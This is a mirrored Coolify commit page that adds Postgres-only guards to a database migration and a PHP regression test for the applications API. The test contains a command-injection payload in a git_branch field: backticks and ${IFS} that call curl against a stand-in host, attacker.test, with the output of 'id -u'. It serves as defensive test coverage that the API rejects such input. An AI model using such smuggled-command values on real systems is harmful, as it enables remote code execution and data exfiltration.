references/coolify
1
0
Fork 0
mirror of https://github.com/coollabsio/coolify.git synced 2026-06-13 19:09:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

fix(db): skip postgres tuning outside pgsql

Browse Source 
Guard the fillfactor/autovacuum migration on non-Postgres connections.
Add API regression coverage for command-substitution git_branch payloads.
This commit is contained in:
Andras Bacsai
2026-06-02 11:41:24 +02:00
parent 1bad82cf43
commit 47682a3085
2 changed files with 97 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
database/migrations/2026_05_27_000001_tune_postgres_fillfactor_and_autovacuum.php
+8
View File
@@ -7,6 +7,10 @@ return new class extends Migration
{
public function up(): void
{
if (DB::connection()->getDriverName() !== 'pgsql') {
return;
}
// Fillfactor < 100 leaves free space per page so Postgres can do HOT
// (Heap-Only Tuple) in-place updates instead of allocating a new tuple
// elsewhere. Coolify's hot-update tables churn rows on every Sentinel
@@ -40,6 +44,10 @@ return new class extends Migration
public function down(): void
{
if (DB::connection()->getDriverName() !== 'pgsql') {
return;
}
DB::statement('ALTER TABLE applications RESET (fillfactor, autovacuum_vacuum_scale_factor)');
DB::statement('ALTER TABLE servers RESET (fillfactor, autovacuum_vacuum_scale_factor)');
DB::statement('ALTER TABLE services RESET (fillfactor)');
tests/Feature/Api/ApplicationGitBranchSecurityTest.php
+89
View File
@@ -0,0 +1,89 @@
<?php
use App\Models\Application;
use App\Models\InstanceSettings;
use App\Models\Project;
use App\Models\Server;
use App\Models\StandaloneDocker;
use App\Models\Team;
use App\Models\User;
use Illuminate\Foundation\Testing\RefreshDatabase;
use Illuminate\Support\Str;
use Visus\Cuid2\Cuid2;
uses(RefreshDatabase::class);
beforeEach(function () {
InstanceSettings::unguarded(fn () => InstanceSettings::firstOrCreate(['id' => 0]));
$this->team = Team::factory()->create();
$this->user = User::factory()->create();
$this->team->members()->attach($this->user->id, ['role' => 'owner']);
session(['currentTeam' => $this->team]);
$plainTextToken = Str::random(40);
$token = $this->user->tokens()->create([
'name' => 'git-branch-security-test-'.Str::random(6),
'token' => hash('sha256', $plainTextToken),
'abilities' => ['*'],
'team_id' => $this->team->id,
]);
$this->bearerToken = $token->getKey().'|'.$plainTextToken;
$this->server = Server::factory()->create(['team_id' => $this->team->id]);
StandaloneDocker::withoutEvents(function () {
$this->destination = $this->server->standaloneDockers()->firstOrCreate(
['network' => 'coolify'],
['uuid' => (string) new Cuid2, 'name' => 'test-docker']
);
});
$this->project = Project::create([
'uuid' => (string) new Cuid2,
'name' => 'test-project',
'team_id' => $this->team->id,
]);
$this->environment = $this->project->environments()->first();
$this->application = Application::factory()->create([
'environment_id' => $this->environment->id,
'destination_id' => $this->destination->id,
'destination_type' => $this->destination->getMorphClass(),
'git_branch' => 'main',
]);
});
function gitBranchApiHeaders(string $bearerToken): array
{
return [
'Authorization' => 'Bearer '.$bearerToken,
'Content-Type' => 'application/json',
];
}
describe('PATCH /api/v1/applications/{uuid} git_branch security', function () {
test('rejects backtick command substitution branch payloads', function () {
$payload = 'main`curl${IFS}attacker.test/coolify-rce-`id${IFS}-u``';
$response = $this->withHeaders(gitBranchApiHeaders($this->bearerToken))
->patchJson("/api/v1/applications/{$this->application->uuid}", [
'git_branch' => $payload,
]);
$response->assertUnprocessable()
->assertJsonValidationErrors('git_branch');
expect($this->application->refresh()->git_branch)->toBe('main');
});
test('accepts safe branch names', function () {
$response = $this->withHeaders(gitBranchApiHeaders($this->bearerToken))
->patchJson("/api/v1/applications/{$this->application->uuid}", [
'git_branch' => 'feature/safe-branch_1.2.3',
]);
$response->assertOk();
expect($this->application->refresh()->git_branch)->toBe('feature/safe-branch_1.2.3');
});
});